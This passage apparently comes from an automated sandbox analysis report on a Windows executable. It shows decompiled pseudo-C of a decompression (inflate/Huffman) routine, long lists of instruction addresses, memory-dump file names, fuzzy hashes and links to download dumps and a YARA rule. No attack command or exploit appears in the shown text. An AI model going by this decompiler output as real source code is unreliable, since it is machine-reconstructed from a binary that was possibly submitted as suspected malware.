											L28:
											__eax =  *(__ebp - 0x40);
											__ebx = 0;
											__eax =  *(__ebp - 0x40) & 0x0000ffff;
											 *(__ebp - 0x40) = 0;
											__eflags = __eax;
											__esi[1] = __eax;
											if(__eax == 0) {
												goto L53;
											}
											L29:
											_push(0xa);
											_pop(__eax);
											goto L54;
										case 0xa:
											L30:
											__eflags =  *(__ebp - 0x34);
											if( *(__ebp - 0x34) == 0) {
												goto L182;
											}
											L31:
											__eax =  *(__ebp - 0x2c);
											__eflags = __eax;
											if(__eax != 0) {
												L48:
												__eflags = __eax -  *(__ebp - 0x34);
												if(__eax >=  *(__ebp - 0x34)) {
													__eax =  *(__ebp - 0x34);
												}
												__ecx = __esi[1];
												__eflags = __ecx - __eax;
												__edi = __ecx;
												if(__ecx >= __eax) {
													__edi = __eax;
												}
												__eax = E0040568C( *(__ebp - 0x30),  *(__ebp - 0x38), __edi);
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + __edi;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - __edi;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __edi;
												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) - __edi;
												_t80 =  &(__esi[1]);
												 *_t80 = __esi[1] - __edi;
												__eflags =  *_t80;
												if( *_t80 == 0) {
													L53:
													__eax = __esi[0x145];
													L54:
													 *__esi = __eax;
												}
												goto L180;
											}
											L32:
											__ecx = __esi[0x26e8];
											__edx =  *(__ebp - 0x30);
											__eflags = __edx - __ecx;
											if(__edx != __ecx) {
												L38:
												__esi[0x26ea] = __edx;
												__eax = E00406848( *((intOrPtr*)(__ebp + 8)));
												__edx = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edx - __ecx;
												 *(__ebp - 0x30) = __edx;
												if(__edx >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edx;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edx;
													__eax = __ecx - __edx - 1;
												}
												__edi = __esi[0x26e8];
												 *(__ebp - 0x2c) = __eax;
												__eflags = __edx - __edi;
												if(__edx == __edi) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __edx - __ecx;
													if(__eflags != 0) {
														 *(__ebp - 0x30) = __edx;
														if(__eflags >= 0) {
															__edi = __edi - __edx;
															__eflags = __edi;
															__eax = __edi;
														} else {
															__ecx = __ecx - __edx;
															__eax = __ecx;
														}
														 *(__ebp - 0x2c) = __eax;
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L183;
												} else {
													goto L48;
												}
											}
											L33:
											__eax = __esi[0x26e9];
											__edi =  &(__esi[0x6e8]);
											__eflags = __eax - __edi;
											if(__eax == __edi) {
												goto L38;
											}
											L34:
											__edx = __edi;
											__eflags = __edx - __eax;
											 *(__ebp - 0x30) = __edx;
											if(__edx >= __eax) {
												__ecx = __ecx - __edx;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edx;
												__eax = __eax - 1;
											}
											__eflags = __eax;
											 *(__ebp - 0x2c) = __eax;
											if(__eax != 0) {
												goto L48;
											} else {
												goto L38;
											}
										case 0xb:
											goto L56;
										case 0xc:
											L60:
											__esi[1] = __esi[1] >> 0xa;
											__eax = (__esi[1] >> 0xa) + 4;
											if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
												goto L68;
											}
											goto L61;
										case 0xd:
											while(1) {
												L93:
												__eax = __esi[1];
												__ecx = __esi[2];
												__edx = __eax;
												__eax = __eax & 0x0000001f;
												__edx = __edx >> 5;
												__eax = __edx + __eax + 0x102;
												__eflags = __esi[2] - __eax;
												if(__esi[2] >= __eax) {
													break;
												}
												L73:
												__eax = __esi[0x143];
												while(1) {
													L76:
													__eflags = __ebx - __eax;
													if(__ebx >= __eax) {
														break;
													}
													L74:
													__eflags =  *(__ebp - 0x34);
													if( *(__ebp - 0x34) == 0) {
														goto L182;
													}
													L75:
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
													__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
													__ecx = __ebx;
													__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
													 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
													 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
													__ebx = __ebx + 8;
													__eflags = __ebx;
												}
												L77:
												__eax =  *(0x4093d4 + __eax * 2) & 0x0000ffff;
												__eax = __eax &  *(__ebp - 0x40);
												__ecx = __esi[0x144];
												__eax = __esi[0x144] + __eax * 4;
												__edx =  *(__eax + 1) & 0x000000ff;
												__eax =  *(__eax + 2) & 0x0000ffff;
												__eflags = __eax - 0x10;
												 *(__ebp - 0x14) = __eax;
												if(__eax >= 0x10) {
													L79:
													__eflags = __eax - 0x12;
													if(__eax != 0x12) {
														__eax = __eax + 0xfffffff2;
														 *(__ebp - 8) = 3;
													} else {
														_push(7);
														 *(__ebp - 8) = 0xb;
														_pop(__eax);
													}
													while(1) {
														L84:
														__ecx = __eax + __edx;
														__eflags = __ebx - __eax + __edx;
														if(__ebx >= __eax + __edx) {
															break;
														}
														L82:
														__eflags =  *(__ebp - 0x34);
														if( *(__ebp - 0x34) == 0) {
															goto L182;
														}
														L83:
														__ecx =  *(__ebp - 0x38);
														 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
														__edi =  *( *(__ebp - 0x38)) & 0x000000ff;
														__ecx = __ebx;
														__edi = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
														 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
														 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
														__ebx = __ebx + 8;
														__eflags = __ebx;
													}
													L85:
													__ecx = __edx;
													__ebx = __ebx - __edx;
													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
													 *(0x4093d4 + __eax * 2) & 0x0000ffff =  *(0x4093d4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
													__edx =  *(__ebp - 8);
													__ebx = __ebx - __eax;
													__edx =  *(__ebp - 8) + ( *(0x4093d4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
													__ecx = __eax;
													__eax = __esi[1];
													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
													__ecx = __esi[2];
													__eax = __eax >> 5;
													__edi = __eax >> 0x00000005 & 0x0000001f;
													__eax = __eax & 0x0000001f;
													__eax = __edi + __eax + 0x102;
													__edi = __edx + __ecx;
													__eflags = __edx + __ecx - __eax;
													if(__edx + __ecx > __eax) {
														goto L9;
													}
													L86:
													__eflags =  *(__ebp - 0x14) - 0x10;
													if( *(__ebp - 0x14) != 0x10) {
														L89:
														__edi = 0;
														__eflags = 0;
														L90:
														__eax = __esi + 0xc + __ecx * 4;
														do {
															L91:
															 *__eax = __edi;
															__ecx = __ecx + 1;
															__eax = __eax + 4;
															__edx = __edx - 1;
															__eflags = __edx;
														} while (__edx != 0);
														__esi[2] = __ecx;
														continue;
													}
													L87:
													__eflags = __ecx - 1;
													if(__ecx < 1) {
														goto L9;
													}
													L88:
													__edi =  *(__esi + 8 + __ecx * 4);
													goto L90;
												}
												L78:
												__ecx = __edx;
												__ebx = __ebx - __edx;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
												__ecx = __esi[2];
												 *(__esi + 0xc + __esi[2] * 4) = __eax;
												__esi[2] = __esi[2] + 1;
											}
											L94:
											__eax = __esi[1];
											__esi[0x144] = __esi[0x144] & 0x00000000;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) & 0x00000000;
											__edi = __eax;
											__eax = __eax >> 5;
											__edi = __edi & 0x0000001f;
											__ecx = 0x101;
											__eax = __eax & 0x0000001f;
											__edi = __edi + 0x101;
											__eax = __eax + 1;
											__edx = __ebp - 0xc;
											 *(__ebp - 0x14) = __eax;
											 &(__esi[0x148]) = __ebp - 4;
											 *(__ebp - 4) = 9;
											__ebp - 0x18 =  &(__esi[3]);
											 *(__ebp - 0x10) = 6;
											__eax = E004068B0( &(__esi[3]), __edi, 0x101, 0x407328, 0x407368, __ebp - 0x18, __ebp - 4,  &(__esi[0x148]), __ebp - 0xc);
											__eflags =  *(__ebp - 4);
											if( *(__ebp - 4) == 0) {
												__eax = __eax | 0xffffffff;
												__eflags = __eax;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L9;
											} else {
												L97:
												__ebp - 0xc =  &(__esi[0x148]);
												__ebp - 0x10 = __ebp - 0x1c;
												__eax = __esi + 0xc + __edi * 4;
												__eax = E004068B0(__esi + 0xc + __edi * 4,  *(__ebp - 0x14), 0, 0x4073a8, 0x4073e4, __ebp - 0x1c, __ebp - 0x10,  &(__esi[0x148]), __ebp - 0xc);
												__eflags = __eax;
												if(__eax != 0) {
													goto L9;
												}
												L98:
												__eax =  *(__ebp - 0x10);
												__eflags =  *(__ebp - 0x10);
												if( *(__ebp - 0x10) != 0) {
													L100:
													__cl =  *(__ebp - 4);
													 *__esi =  *__esi & 0x00000000;
													__eflags =  *__esi;
													__esi[4] = __al;
													__eax =  *(__ebp - 0x18);
													__esi[5] =  *(__ebp - 0x18);
													__eax =  *(__ebp - 0x1c);
													__esi[4] = __cl;
													__esi[6] =  *(__ebp - 0x1c);
													goto L101;
												}
												L99:
												__eflags = __edi - 0x101;
												if(__edi > 0x101) {
													goto L9;
												}
												goto L100;
											}
										case 0xe:
											goto L9;
										case 0xf:
											L175:
											__eax =  *(__ebp - 0x30);
											__esi[0x26ea] =  *(__ebp - 0x30);
											__eax = E00406848( *((intOrPtr*)(__ebp + 8)));
											__ecx = __esi[0x26ea];
											__edx = __esi[0x26e9];
											__eflags = __ecx - __edx;
											 *(__ebp - 0x30) = __ecx;
											if(__ecx >= __edx) {
												__eax = __esi[0x26e8];
												__eax = __esi[0x26e8] - __ecx;
												__eflags = __eax;
											} else {
												__edx = __edx - __ecx;
												__eax = __edx - __ecx - 1;
											}
											__eflags = __ecx - __edx;
											 *(__ebp - 0x2c) = __eax;
											if(__ecx != __edx) {
												L183:
												__edi = 0;
												goto L10;
											} else {
												L179:
												__eax = __esi[0x145];
												__eflags = __eax - 8;
												 *__esi = __eax;
												if(__eax != 8) {
													L184:
													0 = 1;
													goto L10;
												}
												goto L180;
											}
									}
								}
								L181:
								goto L9;
							}
							L70:
							if( *__edi == __eax) {
								goto L72;
							}
							L71:
							__esi[2] = __esi[2] & __eax;
							 *__esi = 0xd;
							goto L93;
						}
					}
				}
				L182:
				_t443 = 0;
				_t446[0x147] =  *(_t448 - 0x40);
				_t446[0x146] = _t425;
				( *(_t448 + 8))[1] = 0;
				goto L11;
			}

0x004060d9
0x004060d9
0x004060d9
0x004060d9
0x004060d9
0x004060dd
0x00000000
0x00000000
0x004060e3
0x004060e3
0x004060e6
0x004060e9
0x004060ee
0x004060f0
0x004060f3
0x004060f6
0x004060f9
0x004060f9
0x004060fc
0x00000000
0x00000000
0x004060fe
0x004060fe
0x00406101
0x00406106
0x00406108
0x0040610b
0x00406111
0x00405e70
0x00405e70
0x00405e73
0x00405e79
0x00405e7f
0x00405e88
0x00405e8e
0x00405e91
0x00405e98
0x00405e9d
0x00405ea3
0x00405eae
0x00405eae
0x00406117
0x00406117
0x00406121
0x00000000
0x00000000
0x00406127
0x00406127
0x0040612b
0x0040612e
0x0040612e
0x00406132
0x00406138
0x00406138
0x0040613b
0x0040613e
0x00406144
0x00000000
0x00000000
0x00406146
0x00406168
0x00406168
0x0040616b
0x00000000
0x00000000
0x00406148
0x0040614c
0x00000000
0x00000000
0x00406152
0x00406152
0x00406155
0x00406158
0x0040615d
0x0040615f
0x00406162
0x00406165
0x00406165
0x0040616d
0x0040616d
0x00406173
0x00406176
0x00406179
0x00406179
0x00406180
0x00406184
0x00406188
0x0040618b
0x0040618e
0x00406194
0x00406199
0x00000000
0x00000000
0x0040619b
0x004061af
0x004061af
0x004061b3
0x00000000
0x00000000
0x0040619d
0x004061a0
0x004061a0
0x004061a7
0x004061ac
0x004061ac
0x004061ac
0x004061b5
0x004061b5
0x004061b8
0x004061c6
0x004061cc
0x004061d1
0x004061d7
0x004061dd
0x004061e3
0x004061ea
0x004061fe
0x004061fe
0x004067cd
0x004067cd
0x004067cd
0x004067d2
0x00000000
0x00000000
0x00405e0a
0x00405e0a
0x00000000
0x00406405
0x00406405
0x00406409
0x0040640c
0x0040640f
0x00406412
0x00000000
0x00000000
0x00406418
0x00406418
0x0040643d
0x0040643d
0x0040643d
0x0040643f
0x00000000
0x00000000
0x0040641d
0x0040641d
0x00406421
0x00000000
0x00000000
0x00406427
0x00406427
0x0040642a
0x0040642d
0x00406430
0x00406432
0x00406434
0x00406437
0x0040643a
0x0040643a
0x0040643a
0x00406441
0x00406441
0x00406449
0x0040644c
0x0040644f
0x00406452
0x00406456
0x00406459
0x0040645b
0x0040645e
0x00406460
0x00406474
0x00406474
0x00406477
0x00406491
0x00406491
0x00406494
0x00000000
0x00000000
0x0040649a
0x0040649a
0x0040649d
0x00000000
0x00000000
0x004064a3
0x004064a3
0x00000000
0x004064a3
0x00406479
0x0040647c
0x00406483
0x00406486
0x00000000
0x00406486
0x00406462
0x00406466
0x00406469
0x00000000
0x00000000
0x004064ae
0x004064ae
0x004064d3
0x004064d3
0x004064d3
0x004064d5
0x00000000
0x00000000
0x004064b3
0x004064b3
0x004064b7
0x00000000
0x00000000
0x004064bd
0x004064bd
0x004064c0
0x004064c3
0x004064c6
0x004064c8
0x004064ca
0x004064cd
0x004064d0
0x004064d0
0x004064d0
0x004064d7
0x004064df
0x004064e2
0x004064e5
0x004064e7
0x004064ea
0x004064ea
0x004064ec
0x004064f0
0x004064f3
0x004064f6
0x004064f9
0x00000000
0x00000000
0x004064ff
0x004064ff
0x00406524
0x00406524
0x00406524
0x00406526
0x00000000
0x00000000
0x00406504
0x00406504
0x00406508
0x00000000
0x00000000
0x0040650e
0x0040650e
0x00406511
0x00406514
0x00406517
0x00406519
0x0040651b
0x0040651e
0x00406521
0x00406521
0x00406521
0x00406528
0x00406528
0x00406530
0x00406533
0x00406536
0x00406539
0x0040653d
0x00406540
0x00406542
0x00406545
0x00406548
0x00406562
0x00406562
0x00406565
0x00000000
0x00000000
0x0040656b
0x0040656b
0x0040656e
0x00406575
0x00000000
0x00406575
0x0040654a
0x0040654d
0x00406554
0x00406557
0x00000000
0x00000000
0x0040657d
0x0040657d
0x004065a2
0x004065a2
0x004065a2
0x004065a4
0x00000000
0x00000000
0x00406582
0x00406582
0x00406586
0x00000000
0x00000000
0x0040658c
0x0040658c
0x0040658f
0x00406592
0x00406595
0x00406597
0x00406599
0x0040659c
0x0040659f
0x0040659f
0x0040659f
0x004065a6
0x004065ae
0x004065b1
0x004065b4
0x004065b6
0x004065b9
0x004065b9
0x004065bb
0x00000000
0x00000000
0x004065c1
0x004065c1
0x004065c4
0x004065c9
0x004065cb
0x004065d1
0x004065d3
0x004065e8
0x004065ea
0x004065ea
0x004065d5
0x004065db
0x004065dd
0x004065df
0x004065df
0x004065ec
0x004065f0
0x004065f3
0x004065f9
0x004065f9
0x004065fc
0x004065fc
0x004065fc
0x004065fe
0x00000000
0x00000000
0x00406604
0x00406604
0x0040660a
0x0040660c
0x00406631
0x00406634
0x0040663a
0x0040663f
0x00406645
0x0040664b
0x0040664d
0x00406650
0x00406659
0x0040665f
0x0040665f
0x00406652
0x00406654
0x00406656
0x00406656
0x00406661
0x00406667
0x00406669
0x0040666c
0x0040666e
0x00406674
0x00406676
0x00406678
0x0040667a
0x0040667c
0x0040667f
0x00406688
0x0040668b
0x0040668b
0x00406681
0x00406681
0x00406684
0x00406684
0x0040667f
0x00406676
0x0040668d
0x0040668f
0x00000000
0x00000000
0x00000000
0x00000000
0x0040668f
0x0040660e
0x0040660e
0x00406614
0x0040661a
0x0040661c
0x00000000
0x00000000
0x0040661e
0x0040661e
0x00406620
0x00406622
0x0040662b
0x0040662b
0x00406624
0x00406624
0x00406627
0x00406627
0x0040662d
0x0040662f
0x00000000
0x00000000
0x00406695
0x00406695
0x0040669a
0x0040669c
0x0040669d
0x0040669e
0x0040669f
0x004066a5
0x004066a8
0x004066ab
0x004066ae
0x004066b0
0x004066b6
0x004066b6
0x004066b9
0x004066b9
0x004066b9
0x004066b9
0x004066c2
0x00000000
0x00000000
0x004066c7
0x004066c7
0x004066ca
0x004066cd
0x004066cf
0x00406766
0x00406766
0x00406769
0x0040676b
0x0040676c
0x0040676d
0x00406770
0x00000000
0x00406770
0x004066d5
0x004066d5
0x004066db
0x004066dd
0x00406702
0x00406705
0x0040670b
0x00406710
0x00406716
0x0040671c
0x0040671e
0x00406721
0x0040672a
0x00406730
0x00406730
0x00406723
0x00406725
0x00406727
0x00406727
0x00406732
0x00406738
0x0040673a
0x0040673d
0x0040673f
0x00406745
0x00406747
0x00406749
0x0040674b
0x0040674d
0x00406750
0x00406759
0x0040675c
0x0040675c
0x00406752
0x00406752
0x00406755
0x00406755
0x00406750
0x00406747
0x0040675e
0x00406760
0x00000000
0x00000000
0x00000000
0x00000000
0x00406760
0x004066df
0x004066df
0x004066e5
0x004066eb
0x004066ed
0x00000000
0x00000000
0x004066ef
0x004066ef
0x004066f1
0x004066f3
0x004066fa
0x004066fa
0x004066fc
0x004066f5
0x004066f5
0x004066f7
0x004066f7
0x004066fe
0x00406700
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406778
0x00406778
0x0040677b
0x0040677d
0x00406780
0x00406783
0x00406783
0x00406783
0x00406783
0x00000000
0x00000000
0x00000000
0x00405e31
0x00405e15
0x00000000
0x00405e1b
0x00405e1e
0x00405e28
0x00405e2b
0x00405e2e
0x00000000
0x00405e2e
0x00405e15
0x00405e39
0x00405e3c
0x00405e40
0x00405e4a
0x00405e54
0x00405e57
0x00405e5d
0x00405f91
0x00405f93
0x00405f99
0x00405f9c
0x00405f9f
0x00000000
0x00405f9f
0x00405e63
0x00405e63
0x00405e64
0x00405ebc
0x00405ebc
0x00405ec3
0x00405f69
0x00405f69
0x00405f6e
0x00405f71
0x00405f76
0x00405f79
0x00405f7e
0x00405f81
0x00405f86
0x00405f89
0x00405f89
0x00000000
0x00405ec9
0x00405ec9
0x00405ec9
0x00405ec9
0x00405ecd
0x00405ecd
0x00405eef
0x00405ef2
0x00405ef4
0x00405ef7
0x00405efc
0x00405ed2
0x00405ed2
0x00405ed7
0x00405ed9
0x00405edb
0x00405ee0
0x00405ee6
0x00405eeb
0x00405eed
0x00405eed
0x00405ee2
0x00405ee2
0x00405ee2
0x00405ee0
0x00000000
0x00405efe
0x00405f2b
0x00405f30
0x00405f32
0x00405f33
0x00405f35
0x00405f36
0x00405f36
0x00405f36
0x00405f5e
0x00405f63
0x00405f63
0x00000000
0x00405f63
0x00405efc
0x00405ec3
0x00405e66
0x00405e66
0x00405e67
0x00405eb1
0x00000000
0x00405eb1
0x00405e69
0x00405e6a
0x00000000
0x00000000
0x00000000
0x00000000
0x00405fc6
0x00405fc6
0x00405fc6
0x00405fc9
0x00000000
0x00000000
0x00405fa6
0x00405fa6
0x00405faa
0x00000000
0x00000000
0x00405fb0
0x00405fb0
0x00405fb3
0x00405fb6
0x00405fbb
0x00405fbd
0x00405fc0
0x00405fc3
0x00405fc3
0x00405fc3
0x00405fcb
0x00405fcb
0x00405fce
0x00405fd0
0x00405fd5
0x00405fd8
0x00405fda
0x00405fdd
0x00000000
0x00000000
0x00405fe3
0x00405fe3
0x00405fe5
0x00000000
0x00000000
0x00405feb
0x00405feb
0x00405fef
0x00000000
0x00000000
0x00405ff5
0x00405ff5
0x00405ff8
0x00405ffa
0x00406098
0x00406098
0x0040609b
0x0040609d
0x0040609d
0x004060a0
0x004060a3
0x004060a5
0x004060a7
0x004060a9
0x004060a9
0x004060b2
0x004060b7
0x004060ba
0x004060bd
0x004060c0
0x004060c3
0x004060c3
0x004060c3
0x004060c6
0x004060cc
0x004060cc
0x004060d2
0x004060d2
0x004060d2
0x00000000
0x004060c6
0x00406000
0x00406000
0x00406006
0x00406009
0x0040600b
0x00406036
0x00406039
0x0040603f
0x00406044
0x0040604a
0x00406050
0x00406052
0x00406055
0x0040605e
0x00406064
0x00406064
0x00406057
0x00406059
0x0040605b
0x0040605b
0x00406066
0x0040606c
0x0040606f
0x00406071
0x00406073
0x00406079
0x0040607b
0x0040607d
0x00406080
0x00406089
0x00406089
0x0040608b
0x00406082
0x00406082
0x00406085
0x00406085
0x0040608d
0x0040608d
0x0040607b
0x00406090
0x00406092
0x00000000
0x00000000
0x00000000
0x00000000
0x00406092
0x0040600d
0x0040600d
0x00406013
0x00406019
0x0040601b
0x00000000
0x00000000
0x0040601d
0x0040601d
0x0040601f
0x00406021
0x00406024
0x0040602b
0x0040602b
0x0040602d
0x00406026
0x00406026
0x00406028
0x00406028
0x0040602f
0x00406031
0x00406034
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406138
0x0040613b
0x0040613e
0x00406144
0x00000000
0x00000000
0x00000000
0x00000000
0x0040631b
0x0040631b
0x0040631b
0x0040631e
0x00406321
0x00406323
0x00406326
0x0040632c
0x00406333
0x00406335
0x00000000
0x00000000
0x00406209
0x00406209
0x00406231
0x00406231
0x00406231
0x00406233
0x00000000
0x00000000
0x00406211
0x00406211
0x00406215
0x00000000
0x00000000
0x0040621b
0x0040621b
0x0040621e
0x00406221
0x00406224
0x00406226
0x00406228
0x0040622b
0x0040622e
0x0040622e
0x0040622e
0x00406235
0x00406235
0x0040623d
0x00406240
0x00406246
0x00406249
0x0040624d
0x00406251
0x00406254
0x00406257
0x0040626f
0x0040626f
0x00406272
0x00406280
0x00406283
0x00406274
0x00406274
0x00406276
0x0040627d
0x0040627d
0x004062ac
0x004062ac
0x004062ac
0x004062af
0x004062b1
0x00000000
0x00000000
0x0040628c
0x0040628c
0x00406290
0x00000000
0x00000000
0x00406296
0x00406296
0x00406299
0x0040629c
0x0040629f
0x004062a1
0x004062a3
0x004062a6
0x004062a9
0x004062a9
0x004062a9
0x004062b3
0x004062b3
0x004062b5
0x004062b7
0x004062c2
0x004062c5
0x004062c8
0x004062ca
0x004062cc
0x004062ce
0x004062d1
0x004062d4
0x004062d9
0x004062dc
0x004062df
0x004062e2
0x004062e9
0x004062ec
0x004062ee
0x00000000
0x00000000
0x004062f4
0x004062f4
0x004062f8
0x00406309
0x00406309
0x00406309
0x0040630b
0x0040630b
0x0040630f
0x0040630f
0x0040630f
0x00406311
0x00406312
0x00406315
0x00406315
0x00406315
0x00406318
0x00000000
0x00406318
0x004062fa
0x004062fa
0x004062fd
0x00000000
0x00000000
0x00406303
0x00406303
0x00000000
0x00406303
0x00406259
0x00406259
0x0040625b
0x0040625d
0x00406260
0x00406263
0x00406267
0x00406267
0x0040633b
0x0040633b
0x0040633e
0x00406345
0x00406349
0x0040634b
0x0040634e
0x00406351
0x00406356
0x00406359
0x0040635b
0x0040635c
0x0040635f
0x0040636a
0x0040636d
0x00406384
0x00406389
0x00406390
0x00406395
0x00406399
0x0040639b
0x0040639b
0x0040639b
0x0040639e
0x004063a0
0x00000000
0x004063a6
0x004063a6
0x004063aa
0x004063b5
0x004063c8
0x004063cd
0x004063d2
0x004063d4
0x00000000
0x00000000
0x004063da
0x004063da
0x004063dd
0x004063df
0x004063ed
0x004063ed
0x004063f0
0x004063f0
0x004063f3
0x004063f6
0x004063f9
0x004063fc
0x004063ff
0x00406402
0x00000000
0x00406402
0x004063e1
0x004063e1
0x004063e7
0x00000000
0x00000000
0x00000000
0x004063e7
0x00000000
0x00000000
0x00000000
0x00406786
0x00406786
0x0040678c
0x00406792
0x00406797
0x0040679d
0x004067a3
0x004067a5
0x004067a8
0x004067b1
0x004067b7
0x004067b7
0x004067aa
0x004067ac
0x004067ae
0x004067ae
0x004067b9
0x004067bb
0x004067be
0x004067f9
0x004067f9
0x00000000
0x004067c0
0x004067c0
0x004067c0
0x004067c6
0x004067c9
0x004067cb
0x00406800
0x00406802
0x00000000
0x00406802
0x00000000
0x004067cb
0x00000000
0x00405e0a
0x004067d8
0x00000000
0x004067d8
0x004061ec
0x004061ee
0x00000000
0x00000000
0x004061f0
0x004061f0
0x004061f3
0x00000000
0x004061f3
0x00406138
0x004060f9
0x004067dd
0x004067e0
0x004067e2
0x004067eb
0x004067f1
0x00000000

Memory Dump Source

Source File: 00000001.00000002.703506030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.703501549.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703512735.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703519233.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703528650.0000000000414000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703538539.0000000000420000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703576080.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703598048.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703605312.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f87c7fd812bd23a44b041bc42b52fb770af610f3898ecf88972882777d09f08b
Instruction ID: e18c77a923ccc912ff38ee9e75da799f543520498237710dfa30f1c5ce12811a
Opcode Fuzzy Hash: f87c7fd812bd23a44b041bc42b52fb770af610f3898ecf88972882777d09f08b
Instruction Fuzzy Hash: 4CE16871900B09DFDB24CF58C880BAAB7F5EF44305F15852EE897AB291D338AA95CF54

Uniqueness

Uniqueness Score: -1.00%

Function 004068B0, Relevance: .3, Instructions: 300
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E004068B0(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr* _v32;
				signed int* _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v116;
				signed int _v176;
				signed int _v180;
				signed int _v240;
				signed int _t166;
				signed int _t168;
				intOrPtr _t175;
				signed int _t181;
				void* _t182;
				intOrPtr _t183;
				signed int* _t184;
				signed int _t186;
				signed int _t187;
				signed int* _t189;
				signed int _t190;
				intOrPtr* _t191;
				intOrPtr _t192;
				signed int _t193;
				signed int _t195;
				signed int _t200;
				signed int _t205;
				void* _t207;
				short _t208;
				signed char _t222;
				signed int _t224;
				signed int _t225;
				signed int* _t232;
				signed int _t233;
				signed int _t234;
				void* _t235;
				signed int _t236;
				signed int _t244;
				signed int _t246;
				signed int _t251;
				signed int _t254;
				signed int _t256;
				signed int _t259;
				signed int _t262;
				void* _t263;
				void* _t264;
				signed int _t267;
				intOrPtr _t269;
				intOrPtr _t271;
				signed int _t274;
				intOrPtr* _t275;
				unsigned int _t276;
				void* _t277;
				signed int _t278;
				intOrPtr* _t279;
				signed int _t281;
				intOrPtr _t282;
				intOrPtr _t283;
				signed int* _t284;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				signed int _t296;
				signed int* _t297;
				intOrPtr _t298;
				void* _t299;

				_t278 = _a8;
				_t187 = 0x10;
				memset( &_v116, 0, _t187 << 2);
				_t189 = _a4;
				_t233 = _t278;
				do {
					_t166 =  *_t189;
					_t189 =  &(_t189[1]);
					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
					_t233 = _t233 - 1;
				} while (_t233 != 0);
				if(_v116 != _t278) {
					_t279 = _a28;
					_t267 =  *_t279;
					_t190 = 1;
					_a28 = _t267;
					_t234 = 0xf;
					while(1) {
						_t168 = 0;
						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
							break;
						}
						_t190 = _t190 + 1;
						if(_t190 <= _t234) {
							continue;
						}
						break;
					}
					_v8 = _t190;
					if(_t267 < _t190) {
						_a28 = _t190;
					}
					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
						_t234 = _t234 - 1;
						if(_t234 != 0) {
							continue;
						}
						break;
					}
					_v28 = _t234;
					if(_a28 > _t234) {
						_a28 = _t234;
					}
					 *_t279 = _a28;
					_t181 = 1 << _t190;
					while(_t190 < _t234) {
						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
						if(_t182 < 0) {
							L64:
							return _t168 | 0xffffffff;
						}
						_t190 = _t190 + 1;
						_t181 = _t182 + _t182;
					}
					_t281 = _t234 << 2;
					_t191 = _t299 + _t281 - 0x70;
					_t269 =  *_t191;
					_t183 = _t181 - _t269;
					_v52 = _t183;
					if(_t183 < 0) {
						goto L64;
					}
					_v176 = _t168;
					 *_t191 = _t269 + _t183;
					_t192 = 0;
					_t235 = _t234 - 1;
					if(_t235 == 0) {
						L21:
						_t184 = _a4;
						_t271 = 0;
						do {
							_t193 =  *_t184;
							_t184 =  &(_t184[1]);
							if(_t193 != _t168) {
								_t232 = _t299 + _t193 * 4 - 0xb0;
								_t236 =  *_t232;
								 *((intOrPtr*)(0x42d6b8 + _t236 * 4)) = _t271;
								 *_t232 = _t236 + 1;
							}
							_t271 = _t271 + 1;
						} while (_t271 < _a8);
						_v16 = _v16 | 0xffffffff;
						_v40 = _v40 & 0x00000000;
						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
						_t195 = _v8;
						_t186 =  ~_a28;
						_v12 = _t168;
						_v180 = _t168;
